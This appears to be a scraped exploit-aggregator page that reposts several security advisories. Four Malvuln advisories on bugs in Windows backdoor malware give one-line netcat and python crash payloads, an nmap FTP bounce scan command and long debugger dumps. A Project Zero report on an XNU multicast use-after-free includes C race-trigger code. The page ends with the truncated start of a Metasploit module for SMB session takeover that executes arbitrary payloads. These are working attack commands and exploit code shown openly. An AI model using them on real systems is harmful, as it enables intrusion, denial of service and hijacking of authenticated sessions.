Latest exploits :: CodePwn

<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2021 Original source: https://malvuln.com/advisory/bc7f4c4689f1b8ad395404d1e75c776f.txt Contact: malvuln13@gmail.com Media: twitter.com/malvuln Threat: Backdoor.Win32.SubSeven.c Vulnerability: Remote Stack Buffer Overflow Description: The malware listens on TCP port 1111. Third-party attackers who can reach an infected system can send a specially crafted packet prefixed with "DOS". This will trigger a classic stack buffer overflow overwriting ECX, EIP registers and structured exception handler (SEH). Type: PE32 MD5: bc7f4c4689f1b8ad395404d1e75c776f Vuln ID: MVID-2022-0448 Dropped files: (cfvfpgnf.exe) randomly named ASLR: False DEP: False Safe SEH: False Disclosure: 01/05/2022 Memory Dump: (192c.1d7c): Access violation(192c.1d7c): Access violation - code c0000005 (first/second chance not available) - code c0000005 (first/second chance not available) eax=00000000 ebx=00000000 ecx=41414141 edx=773e9d70 esi=00000000 edi=00000000 eip=41414141 esp=000a1600 ebp=000a1620 iopl=0 nv up ei pl zr na pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246 0:000> ecxr *** WARNING: Unable to verify checksum for cfvfpgnf.exe *** ERROR: Module load completed but symbols could not be loaded for cfvfpgnf.exe Couldn't resolve error at 'cxr' 0:000> !analyze -v ******************************************************************************* * * * Exception Analysis * * * ******************************************************************************* Failed calling InternetOpenUrl, GLE=12029 FAULTING_IP: +26 41414141 ?? ??? EXCEPTION_RECORD: 0019ee34 -- (.exr 0x19ee34) 0019ee34 -- (.exr 0x19ee34) ExceptionAddress: 41414141 ExceptionCode: c0000005 (Access violation) ExceptionFlags: 00000000 NumberParameters: 2 Parameter[0]: 00000000 Parameter[1]: 41414141 Attempt to read from address 41414141 PROCESS_NAME: cfvfpgnf.exe ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s. EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s. EXCEPTION_PARAMETER1: 00000008 EXCEPTION_PARAMETER2: 41414141 WRITE_ADDRESS: 41414141 FOLLOWUP_IP: +26 41414141 ?? ??? FAILED_INSTRUCTION_ADDRESS: +26 41414141 ?? ??? MOD_LIST: <ANALYSIS/> NTGLOBALFLAG: 0 APPLICATION_VERIFIER_FLAGS: 0 IP_ON_HEAP: 41414141 The fault address in not in any loaded module, please check your build's rebase log at <releasedir>\bin\build_logs\timebuild\ntrebase.log for module which may contain the address if it were loaded. IP_IN_FREE_BLOCK: 41414141 CONTEXT: MOD_LIST: <ANALYSIS/> CONTEXT: 0019ee84 -- (.cxr 0x19ee84) 0019ee84 -- (.cxr 0x19ee84) eax=00010000 ebx=04163c0c ecx=7673eb0d edx=00000000 esi=005d0a48 edi=04040d17 eip=41414141 esp=0019f2e4 ebp=41414141 iopl=0 nv up ei pl nz na po nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202 41414141 ?? ??? Resetting default scope ADDITIONAL_DEBUG_TEXT: Followup set based on attribute [Is_ChosenCrashFollowupThread] from Frame:[0] on thread:[PSEUDO_THREAD] LAST_CONTROL_TRANSFER: from 41414141 to 41414141 FAULTING_THREAD: ffffffff BUGCHECK_STR: APPLICATION_FAULT_STACK_OVERFLOW_SOFTWARE_NX_FAULT_INVALID_EXPLOITABLE_FILL_PATTERN_41414141_STACKIMMUNE PRIMARY_PROBLEM_CLASS: STACK_OVERFLOW_STACKIMMUNE DEFAULT_BUCKET_ID: STACK_OVERFLOW_STACKIMMUNE FRAME_ONE_INVALID: 1 STACK_TEXT: 00000000 00000000 cfvfpgnf.exe+0x0 STACK_COMMAND: .cxr 000000000019EE84 ; kb ; ** Pseudo Context ** ; kb SYMBOL_NAME: cfvfpgnf.exe FOLLOWUP_NAME: MachineOwner MODULE_NAME: ADDITIONAL_DEBUG_TEXT: Followup set based on attribute [Is_ChosenCrashFollowupThread] from Frame:[0] on thread:[PSEUDO_THREAD] LAST_CONTROL_TRANSFER: from 41414141 to 41414141 FAULTING_THREAD: ffffffff BUGCHECK_STR: APPLICATION_FAULT_STACK_OVERFLOW_SOFTWARE_NX_FAULT_INVALID_EXPLOITABLE_FILL_PATTERN_41414141_STACKIMMUNE PRIMARY_PROBLEM_CLASS: STACK_OVERFLOW_STACKIMMUNE DEFAULT_BUCKET_ID: STACK_OVERFLOW_STACKIMMUNE FRAME_ONE_INVALID: 1 STACK_TEXT: 00000000 00000000 cfvfpgnf.exe+0x0 STACK_COMMAND: .cxr 000000000019EE84 ; kb ; ** Pseudo Context ** ; kb SYMBOL_NAME: cfvfpgnf.exe FOLLOWUP_NAME: MachineOwner MODULE_NAME: cfvfpgnf cfvfpgnf IMAGE_NAME: cfvfpgnf.exe DEBUG_FLR_IMAGE_TIMESTAMP: 2a425e19 FAILURE_BUCKET_ID: STACK_OVERFLOW_STACKIMMUNE_c0000005_cfvfpgnf.exe!Unknown BUCKET_ID: APPLICATION_FAULT_STACK_OVERFLOW_SOFTWARE_NX_FAULT_INVALID_EXPLOITABLE_FILL_PATTERN_41414141_STACKIMMUNE_BAD_IP_cfvfpgnf.exe Followup: MachineOwner --------- 0:000> !exchain ntdll!ExecuteHandler2+44 (773e9d70) 0019f2e4: 0019f2e4: 41414141 41414141 Invalid exception stack at 41414141 Invalid exception stack at 41414141 Exploit/PoC: python -c "print('DOS'+'A'*804)" | nc64.exe x.x.x.x 1111 connected. 23:37 - January 4, 2022, Tuesday, ver: Legends 2.1 Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM). </code></pre>

<pre><code>XNU: heap-use-after-free in inm_merge VULNERABILITY DETAILS bsd/netinet/in_mcast.c: ``` int inp_join_group(struct inpcb *inp, struct sockopt *sopt) { [...] if (is_new) { if (imo->imo_num_memberships == imo->imo_max_memberships) { error = imo_grow(imo, 0); // *** 1 *** if (error) { goto out_imo_locked; } } /* * Allocate the new slot upfront so we can deal with * grafting the new source filter in same code path * as for join-source on existing membership. */ idx = imo->imo_num_memberships; // *** 2 *** imo->imo_membership[idx] = NULL; imo->imo_num_memberships++; VERIFY(imo->imo_mfilters != NULL); imf = &imo->imo_mfilters[idx]; // *** 3 *** VERIFY(RB_EMPTY(&imf->imf_sources)); } [...] if (is_new) { /* * Unlock socket as we may end up calling ifnet_ioctl() to join (or leave) * the multicast group and we run the risk of a lock ordering issue * if the ifnet thread calls into the socket layer to acquire the pcb list * lock while the input thread delivers multicast packets */ IMO_ADDREF_LOCKED(imo); IMO_UNLOCK(imo); socket_unlock(inp->inp_socket, 0); // *** 4 *** VERIFY(inm == NULL); error = in_joingroup(ifp, &gsa->sin_addr, imf, &inm); // *** 5 *** socket_lock(inp->inp_socket, 0); IMO_REMREF(imo); IMO_LOCK(imo); VERIFY(inm != NULL || error != 0); if (error) { goto out_imo_free; } imo->imo_membership[idx] = inm; /* from in_joingroup() */ // *** 6 *** } [...] if (error) { imf_rollback(imf); if (is_new) { imf_purge(imf); } else { imf_reap(imf); } } else { imf_commit(imf); // *** 7 *** } [...] int inp_leave_group(struct inpcb *inp, struct sockopt *sopt) { [...] IMO_LOCK(imo); idx = imo_match_group(imo, ifp, gsa); // *** 8 *** if (idx == (size_t)-1) { error = EADDRNOTAVAIL; goto out_locked; } inm = imo->imo_membership[idx]; imf = &imo->imo_mfilters[idx]; [...] if (is_final) { /* Remove the gap in the membership array. */ VERIFY(inm == imo->imo_membership[idx]); imo->imo_membership[idx] = NULL; /* * See inp_join_group() for why we need to unlock */ IMO_ADDREF_LOCKED(imo); IMO_UNLOCK(imo); // *** 9 *** socket_unlock(inp->inp_socket, 0); INM_REMREF(inm); socket_lock(inp->inp_socket, 0); IMO_REMREF(imo); IMO_LOCK(imo); for (++idx; idx < imo->imo_num_memberships; ++idx) { // *** 10 *** imo->imo_membership[idx - 1] = imo->imo_membership[idx]; imo->imo_mfilters[idx - 1] = imo->imo_mfilters[idx]; } imo->imo_num_memberships--; } ``` When `inp_join_group` needs to create a new membership entry, it briefly releases the socket and `ip_moptions` locks[4]. The locking pattern makes the following issues possible: 1. Before releasing the locks, the function assigns an address inside the `imo_mfilters` buffer to the local variable `imf`[3]. When the locks get dropped[4], a concurrent call to `inp_join_group` may trigger reallocation of `imo_membership` and `imo_mfilters`[1], leaving the `imf` pointer invalid. Then, the dangling pointer is accessed in `in_joingroup`[5] and, after reacquiring the locks, in `imf_commit`[7]. The latter writes to the referenced object, so it should be possible to exploit the bug to corrupt the heap. KASan reports as follows: ``` KASan: invalid 8-byte load from 0xffffff801c07b6e0 [HEAP_FREED] Shadow 0 1 2 3 4 5 6 7 8 9 a b c d e f fffff7f00380f680: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fffff7f00380f690: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fffff7f00380f6a0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fffff7f00380f6b0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fffff7f00380f6c0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fffff7f00380f6d0: fd fd fd fd fd fd fd fd fd fd fd fd[fd]fd fd fd fffff7f00380f6e0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fffff7f00380f6f0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fffff7f00380f700: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fffff7f00380f710: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fffff7f00380f720: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd * thread #2, stop reason = breakpoint 1.1 * frame #0: 0xffffff800e2f32f0 kernel.kasan`panic frame #1: 0xffffff800e303229 kernel.kasan`kasan_report_internal.cold.1 + 25 frame #2: 0xffffff800e2e847d kernel.kasan`kasan_report_internal + 845 frame #3: 0xffffff800e2e5fc3 kernel.kasan`kasan_crash_report + 51 frame #4: 0xffffff800e2e60e5 kernel.kasan`__asan_report_load8 + 21 frame #5: 0xffffff800d7ebaa4 kernel.kasan`inm_merge + 6836 frame #6: 0xffffff800d7ecbc0 kernel.kasan`in_joingroup + 3200 frame #7: 0xffffff800d7f07c3 kernel.kasan`inp_join_group + 6291 frame #8: 0xffffff800d7f4050 kernel.kasan`inp_setmoptions + 672 frame #9: 0xffffff800d85c6ea kernel.kasan`ip_ctloutput + 922 frame #10: 0xffffff800d904617 kernel.kasan`udp_ctloutput + 599 frame #11: 0xffffff800dd0a6cf kernel.kasan`sosetoptlock + 1567 frame #12: 0xffffff800dd38653 kernel.kasan`setsockopt + 787 frame #13: 0xffffff800df8dcd0 kernel.kasan`unix_syscall64 + 2192 frame #14: 0xffffff800d016a36 kernel.kasan`hndl_unix_scall64 + 22 ``` 2. Similarly, the value stored in `idx`[2] may get invalidated by a concurrent call to the `inp_leave_group` function, which removes gaps from `imo_membership` by shifting elements[10]. Therefore, `inp_join_group` may overwrite another element's membership entry[6]. The same issue can be triggered by making two `inp_leave_group` calls race because `inp_leave_group` also saves the requested entry's index[8] before unlocking[9]. However, I was unable to turn this bug into anything more serious than a null pointer dereference, so it's likely a non-security issue. Note that the IPV6 implementation in `in6_mcast.c` is also affected. VERSION macOS 11.5.2 (20G95) REPRODUCTION CASE We need to fill up `imo_mfilters` so that one of the racing threads calls `imo_grow`. ``` #include <arpa/inet.h> #include <pthread.h> #include <unistd.h> volatile int lock_a; volatile int lock_b; int fd; struct sockaddr_in saddr; struct ip_mreq filler_group; struct ip_mreq group_a; struct ip_mreq group_b; void* thread_func(void* arg) { lock_a = 1; while (lock_b == 0) {} setsockopt(fd, IPPROTO_IP, IP_ADD_MEMBERSHIP, &group_a, sizeof(group_a)); return NULL; } int main() { int status; pthread_t th; saddr.sin_family = AF_INET; group_a.imr_multiaddr.s_addr = inet_addr(\"224.0.0.1\"); group_b.imr_multiaddr.s_addr = inet_addr(\"224.0.0.2\"); for (int i = 0; i < 100000; ++i) { fd = socket(AF_INET, SOCK_DGRAM, 0); status = bind(fd, (struct sockaddr *) &saddr, sizeof(saddr)); for (int j = 0; j < IP_MIN_MEMBERSHIPS - 1; ++j) { filler_group.imr_multiaddr.s_addr = htonl(ntohl(inet_addr(\"224.0.0.3\")) + j); status = setsockopt(fd, IPPROTO_IP, IP_ADD_MEMBERSHIP, &filler_group, sizeof(filler_group)); } pthread_create(&th, NULL, thread_func, NULL); while (lock_a == 0) {} lock_b = 1; status = setsockopt(fd, IPPROTO_IP, IP_ADD_MEMBERSHIP, &group_b, sizeof(group_b)); pthread_join(th, NULL); close(fd); } } ``` CREDIT INFORMATION Sergei Glazunov of Google Project Zero This bug is subject to a 90-day disclosure deadline. If a fix for this issue is made available to users before the end of the 90-day deadline, this bug report will become public 30 days after the fix was made available. Otherwise, this bug report will become public at the deadline. The scheduled deadline is 2021-12-06. Related CVE Numbers: CVE-2021-30937. Found by: glazunov@google.com </code></pre>

<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2021 Original source: https://malvuln.com/advisory/011961a42700e7385a106d362eb661c7.txt Contact: malvuln13@gmail.com Media: twitter.com/malvuln Threat: Backdoor.Win32.SVC Vulnerability: Remote Stack Buffer Overflow Description: The malware listens on TCP port 9997. Third-party attackers who can reach an infected system can make an specially crafted HTTP GET request to trigger a classic stack buffer overflow overwriting ECX, EIP registers and structured exception handler (SEH). Type: PE32 MD5: 011961a42700e7385a106d362eb661c7 Vuln ID: MVID-2022-0446 ASLR: False DEP: False Safe SEH: False Disclosure: 01/05/2022 Memory Dump: (31c.1e64): Access violation - code c0000005 (first/second chance not available) eax=00000000 ebx=00000000 ecx=41414141 edx=773e9d70 esi=00000000 edi=00000000 eip=41414141 esp=000a1580 ebp=000a15a0 iopl=0 nv up ei pl zr na pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246 41414141 ?? ??? 0:000> .ecxr eax=00000000 ebx=00000000 ecx=41414141 edx=773e9d70 esi=00000000 edi=00000000 eip=41414141 esp=000a1580 ebp=000a15a0 iopl=0 nv up ei pl zr na pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246 41414141 ?? ??? 0:000> !analyze -v ******************************************************************************* * * * Exception Analysis * * * ******************************************************************************* *** WARNING: Unable to verify checksum for Backdoor.Win32.SVC.011961a42700e7385a106d362eb661c7.exe *** ERROR: Module load completed but symbols could not be loaded for Backdoor.Win32.SVC.011961a42700e7385a106d362eb661c7.exe FAULTING_IP: Backdoor_Win32_SVC_011961a42700e7385a106d362eb661c7+141e 0040141e f3a5 rep movs dword ptr es:[edi],dword ptr [esi] EXCEPTION_RECORD: 0019f360 -- (.exr 0x19f360) ExceptionAddress: 0040141e (Backdoor_Win32_SVC_011961a42700e7385a106d362eb661c7+0x0000141e) ExceptionCode: c0000005 (Access violation) ExceptionFlags: 00000000 NumberParameters: 2 Parameter[0]: 00000001 Parameter[1]: 001a0000 Attempt to write to address 001a0000 PROCESS_NAME: Backdoor.Win32.SVC.011961a42700e7385a106d362eb661c7.exe ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s. EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s. EXCEPTION_PARAMETER1: 00000008 EXCEPTION_PARAMETER2: 41414141 WRITE_ADDRESS: 41414141 FOLLOWUP_IP: mswsock!WSPAccept+0 71c8c1b0 68ec010000 push 1ECh FAILED_INSTRUCTION_ADDRESS: +0 41414141 ?? ??? MOD_LIST: <ANALYSIS/> NTGLOBALFLAG: 0 APPLICATION_VERIFIER_FLAGS: 0 IP_ON_HEAP: 41414141 The fault address in not in any loaded module, please check your build's rebase log at <releasedir>\bin\build_logs\timebuild\ntrebase.log for module which may contain the address if it were loaded. IP_IN_FREE_BLOCK: 41414141 CONTEXT: 0019f3b0 -- (.cxr 0x19f3b0) eax=000007fc ebx=00000000 ecx=00000089 edx=0019fa28 esi=004050ac edi=001a0000 eip=0040141e esp=0019f810 ebp=007c06fe iopl=0 nv up ei pl nz na pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206 Backdoor_Win32_SVC_011961a42700e7385a106d362eb661c7+0x141e: 0040141e f3a5 rep movs dword ptr es:[edi],dword ptr [esi] Resetting default scope ADDITIONAL_DEBUG_TEXT: Followup set based on attribute [Is_ChosenCrashFollowupThread] from Frame:[0] on thread:[PSEUDO_THREAD] LAST_CONTROL_TRANSFER: from 773a13ee to 0040141e FAULTING_THREAD: ffffffff BUGCHECK_STR: APPLICATION_FAULT_STACK_OVERFLOW_SOFTWARE_NX_FAULT_INVALID_EXPLOITABLE_FILL_PATTERN_41414141 PRIMARY_PROBLEM_CLASS: STACK_OVERFLOW_INVALID_EXPLOITABLE_FILL_PATTERN_41414141 DEFAULT_BUCKET_ID: STACK_OVERFLOW_INVALID_EXPLOITABLE_FILL_PATTERN_41414141 STACK_TEXT: 0019f810 0040141e backdoor_win32_svc+0x141e 0019f850 773a13ee ntdll!RtlAllocateHeap+0x3e 0019f89c 71c8cf6d mswsock!WSPAccept+0xdbd 0019fabc 41414141 unknown!printable+0x0 0019ff8c 41414141 unknown!printable+0x0 0019ff90 41414141 unknown!p SYMBOL_NAME: mswsock!WSPAccept+0 FOLLOWUP_NAME: MachineOwner MODULE_NAME: mswsock IMAGE_NAME: mswsock.dll DEBUG_FLR_IMAGE_TIMESTAMP: 0 STACK_COMMAND: .cxr 000000000019F3B0 ; kb ; dds 19f810 ; kb FAILURE_BUCKET_ID: STACK_OVERFLOW_INVALID_EXPLOITABLE_FILL_PATTERN_41414141_c0000005_mswsock.dll!WSPAccept BUCKET_ID: APPLICATION_FAULT_STACK_OVERFLOW_SOFTWARE_NX_FAULT_INVALID_EXPLOITABLE_FILL_PATTERN_41414141_BAD_IP_mswsock!WSPAccept+0 Followup: MachineOwner --------- 0:000> !exchain 000a1594: ntdll!ExecuteHandler2+44 (773e9d70) 000a1b44: ntdll!ExecuteHandler2+44 (773e9d70) ... 0019fc74: 41414141 Invalid exception stack at 41414141 Exploit/PoC: python -c "print('GET /'+'A'*5173+' HTTP/1.1\r\n\r\n')" | nc64.exe x.x.x.x 9997 Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM). </code></pre>

<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2021 Original source: https://malvuln.com/advisory/596882dfba543b23ad3225d24ee5e800_B.txt Contact: malvuln13@gmail.com Media: twitter.com/malvuln Threat: Backdoor.Win32.Jtram.a Vulnerability: Port Bounce Scan Description: The malware listens on TCP port 1321. Third-party intruders who successfully logon can abuse the backdoor FTP server as a man-in-the-middle machine allowing PORT Command bounce scan attacks using Nmap. This vulnerability allows remote attackers to abuse your system and discreetly conduct network port scanning. Victims will then think these scans are originating from the infected system running the afflicted malware FTP Server and not you. Type: PE32 MD5: 596882dfba543b23ad3225d24ee5e800 Vuln ID: MVID-2022-0443 Disclosure: 01/05/2022 Exploit/PoC: nmap -n -Pn -b common:common@192.168.18.129:1321 -p21,22,80 192.168.18.237 -v Starting Nmap 7.80 ( https://nmap.org ) at 2021-12-29 19:11 Pacific Standard Time Resolved FTP bounce attack proxy to 192.168.18.129 (192.168.18.129). Attempting connection to ftp://common:common@192.168.18.129:1321 Connected:220-rconnect 3.12, by WhitSoft Development (www.whitsoftdev.com) 220-You are connecting from 130.18.168.192.in-addr.arpa:5074. 220 Proceed with login. Login credentials accepted by FTP server! Initiating Bounce Scan at 19:12 Discovered open port 80/tcp on 192.168.18.237 Completed Bounce Scan at 19:12, 2.11s elapsed (3 total ports) Nmap scan report for 192.168.18.237 Host is up. PORT STATE SERVICE 21/tcp closed ftp 22/tcp closed ssh 80/tcp open http Read data files from: C:\Program Files (x86)\Nmap Nmap done: 1 IP address (1 host up) scanned in 11.28 seconds Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM). </code></pre>

<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2021 Original source: https://malvuln.com/advisory/6c9665de78ae60a8e057d2c9cdb91596.txt Contact: malvuln13@gmail.com Media: twitter.com/malvuln Threat: Backdoor.Win32.Dsklite.a Vulnerability: Remote Denial of Service Description: The malware listens on TCP ports 890, 891. Third-party attackers who can reach an infected system can connect to port 890, this will in turn open the vuln port 891. Attackers can then send a large payload to DOS the backdoor malware. Type: PE32 MD5: 6c9665de78ae60a8e057d2c9cdb91596 Vuln ID: MVID-2022-0444 Dropped files: winlogon.exe Disclosure: 01/05/2022 Memory Dump: (1628.10d4): Unknown exception - code c000008f (first/second chance not available) eax=00000000 ebx=00000000 ecx=00000002 edx=00000000 esi=00000003 edi=00000003 eip=773ced3c esp=0019f238 ebp=0019f3c8 iopl=0 nv up ei pl nz na po nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202 ntdll!ZwWaitForMultipleObjects+0xc: 773ced3c c21400 ret 14h 0:000> .ecxr eax=0019fb38 ebx=00412a90 ecx=00000002 edx=00000000 esi=0019fc1c edi=02549f28 eip=767508f2 esp=0019fb38 ebp=0019fb94 iopl=0 nv up ei pl nz ac po nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000212 KERNELBASE!RaiseException+0x62: 767508f2 8b4c2454 mov ecx,dword ptr [esp+54h] ss:002b:0019fb8c=6b57a7b6 *** ERROR: Symbol file could not be found. Defaulted to export symbols for msvbvm60.dll - 0:000> !analyze -v ******************************************************************************* * * * Exception Analysis * * * ******************************************************************************* *** ERROR: Module load completed but symbols could not be loaded for winlogon.exe Failed calling InternetOpenUrl, GLE=12029 FAULTING_IP: KERNELBASE!RaiseException+62 767508f2 8b4c2454 mov ecx,dword ptr [esp+54h] EXCEPTION_RECORD: ffffffff -- (.exr 0xffffffffffffffff) ExceptionAddress: 767508f2 (KERNELBASE!RaiseException+0x00000062) ExceptionCode: c000008f ExceptionFlags: 00000001 NumberParameters: 2 Parameter[0]: deadcafe Parameter[1]: deadcafe PROCESS_NAME: winlogon.exe ERROR_CODE: (NTSTATUS) 0xc000008f - {EXCEPTION} Floating-point inexact result. EXCEPTION_CODE: (NTSTATUS) 0xc000008f - {EXCEPTION} Floating-point inexact result. EXCEPTION_PARAMETER1: deadcafe EXCEPTION_PARAMETER2: deadcafe MOD_LIST: <ANALYSIS/> NTGLOBALFLAG: 0 APPLICATION_VERIFIER_FLAGS: 0 FAULTING_THREAD: 000010d4 DEFAULT_BUCKET_ID: STATUS_FLOAT_INEXACT_RESULT PRIMARY_PROBLEM_CLASS: STATUS_FLOAT_INEXACT_RESULT BUGCHECK_STR: APPLICATION_FAULT_STATUS_FLOAT_INEXACT_RESULT LAST_CONTROL_TRANSFER: from 660d0dcf to 767508f2 STACK_TEXT: 0019fb94 660d0dcf c000008f 00000001 00000002 KERNELBASE!RaiseException+0x62 WARNING: Stack unwind information not available. Following frames may be wrong. 0019fbb4 66101d44 00000000 00000000 00000002 msvbvm60!EbGetHandleOfExecutingProject+0x22b3 0019fca0 764ee0bb 00419054 016106bc 0000c280 msvbvm60!ProcCallEngine+0x4ce7 0019fcd0 764f8849 004043b4 016106bc 0000c280 user32!_InternalCallWinProc+0x2b 0019fcf4 764fb145 0000c280 000002e4 00000001 user32!InternalCallWinProc+0x20 0019fdc4 764e90dc 004043b4 00000000 0000c280 user32!UserCallWinProcCheckWow+0x1be 0019fe30 764e38c0 0019fe78 6600a6c8 0019fe50 user32!DispatchMessageWorker+0x4ac 0019fe38 6600a6c8 0019fe50 ffffffff 04071e54 user32!DispatchMessageA+0x10 0019fe78 6600a63f ffffffff 04071e7c 04070000 msvbvm60!_vbaStrToAnsi+0x2f1 0019febc 6600a51d 04071f4c ffffffff 00001628 msvbvm60!_vbaStrToAnsi+0x268 0019fed8 6600a4e8 04071e78 04071f4c ffffffff msvbvm60!_vbaStrToAnsi+0x146 0019fefc 66003644 ffffffff 00401224 00401224 msvbvm60!_vbaStrToAnsi+0x111 003b6000 ffffffff 00400000 77477be0 02541878 msvbvm60!ThunRTMain+0xa0 00000000 00000000 00000000 00000000 00000000 0xffffffff FOLLOWUP_IP: user32!_InternalCallWinProc+2b 764ee0bb 648025ca0f0000fe and byte ptr fs:[0FCAh],0FEh SYMBOL_STACK_INDEX: 3 SYMBOL_NAME: user32!_InternalCallWinProc+2b FOLLOWUP_NAME: MachineOwner MODULE_NAME: user32 IMAGE_NAME: user32.dll DEBUG_FLR_IMAGE_TIMESTAMP: 0 STACK_COMMAND: dt ntdll!LdrpLastDllInitializer BaseDllName ; dt ntdll!LdrpFailureData ; ~0s; .ecxr ; kb FAILURE_BUCKET_ID: STATUS_FLOAT_INEXACT_RESULT_c000008f_user32.dll!_InternalCallWinProc BUCKET_ID: APPLICATION_FAULT_STATUS_FLOAT_INEXACT_RESULT_user32!_InternalCallWinProc+2b Exploit/PoC: 1) connect to port 890 to open vuln port 891 nc64.exe x.x.x.x 890 2) send large packet to trigger DOS python -c "print('A'*2000)" | nc64.exe x.x.x.x 891 Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM). </code></pre>

<pre><code>## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ManualRanking include Msf::Exploit::Remote::Capture include Msf::Exploit::EXE def initialize(info = {}) super( update_info( info, 'Name' => 'Microsoft Windows SMB Direct Session Takeover', 'Description' => %q{ This module will intercept direct SMB authentication requests to another host, gaining access to an authenticated SMB session if successful. If the connecting user is an administrator and network logins are allowed to the target machine, this module will execute an arbitrary payload. To exploit this, the target system must try to autheticate to another host on the local area network. SMB Direct Session takeover is a combination of previous attacks. This module is dependent on an external ARP spoofer. The builtin ARP spoofer was not providing sufficient host discovery. Bettercap v1.6.2 was used during the development of this module. The original SMB relay attack was first reported by Sir Dystic on March 31st, 2001 at @lanta.con in Atlanta, Georgia. }, 'Author' => [ 'usiegl00' ], 'License' => MSF_LICENSE, 'Privileged' => true, 'Payload' => {}, 'References' => [ ['URL', 'https://strontium.io/blog/introducing-windows-10-smb-shadow-attack'] ], 'Arch' => [ARCH_X86, ARCH_X64], 'Platform' => 'win', 'Targets' => [ ['Automatic', {}] ], 'DisclosureDate' => '2021-02-16', 'DefaultTarget' => 0, 'Notes' => { 'Stability' => [ SERVICE_RESOURCE_LOSS ], 'Reliability' => [ UNRELIABLE_SESSION ], 'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ] } ) ) register_options( [ OptString.new('SHARE', [true, 'The share to connect to', 'ADMIN$']), OptString.new('INTERFACE', [true, 'The name of the interface']), OptString.new('DefangedMode', [true, 'Run in defanged mode', true]), OptString.new('DisableFwd', [true, 'Disable packet forwarding on port 445', true]) # For future cross LAN work: # OptString.new('GATEWAY', [ true, "The network gateway ip address" ]) ] ) deregister_options('SNAPLEN', 'FILTER', 'PCAPFILE', 'RHOST', 'SECRET', 'GATEWAY_PROBE_HOST', 'GATEWAY_PROBE_PORT', 'TIMEOUT') end def exploit if datastore['DefangedMode'].to_s == 'true' warning = <<~EOF Are you SURE you want to modify your port forwarding tables? You MAY contaminate your current network configuration. Disable the DefangedMode option if you wish to proceed. EOF fail_with(Failure::BadConfig, warning) end print_good('INFO : Warming up...') print_error('WARNING : Not running as Root. This can cause socket permission issues.') unless Process.uid == 0 @sessions = {} @mutex = Mutex.new @cleanup_mutex = Mutex.new @cleanedup = false @main_threads = [] @interface = datastore['INTERFACE'] # || Pcap.lookupdev unless Socket.getifaddrs.map(&:name).include? @interface fail_with(Failure::BadConfig, "Interface not found: #{@interface}") end @ip4 = ipv4_addresses[@interface]&.first 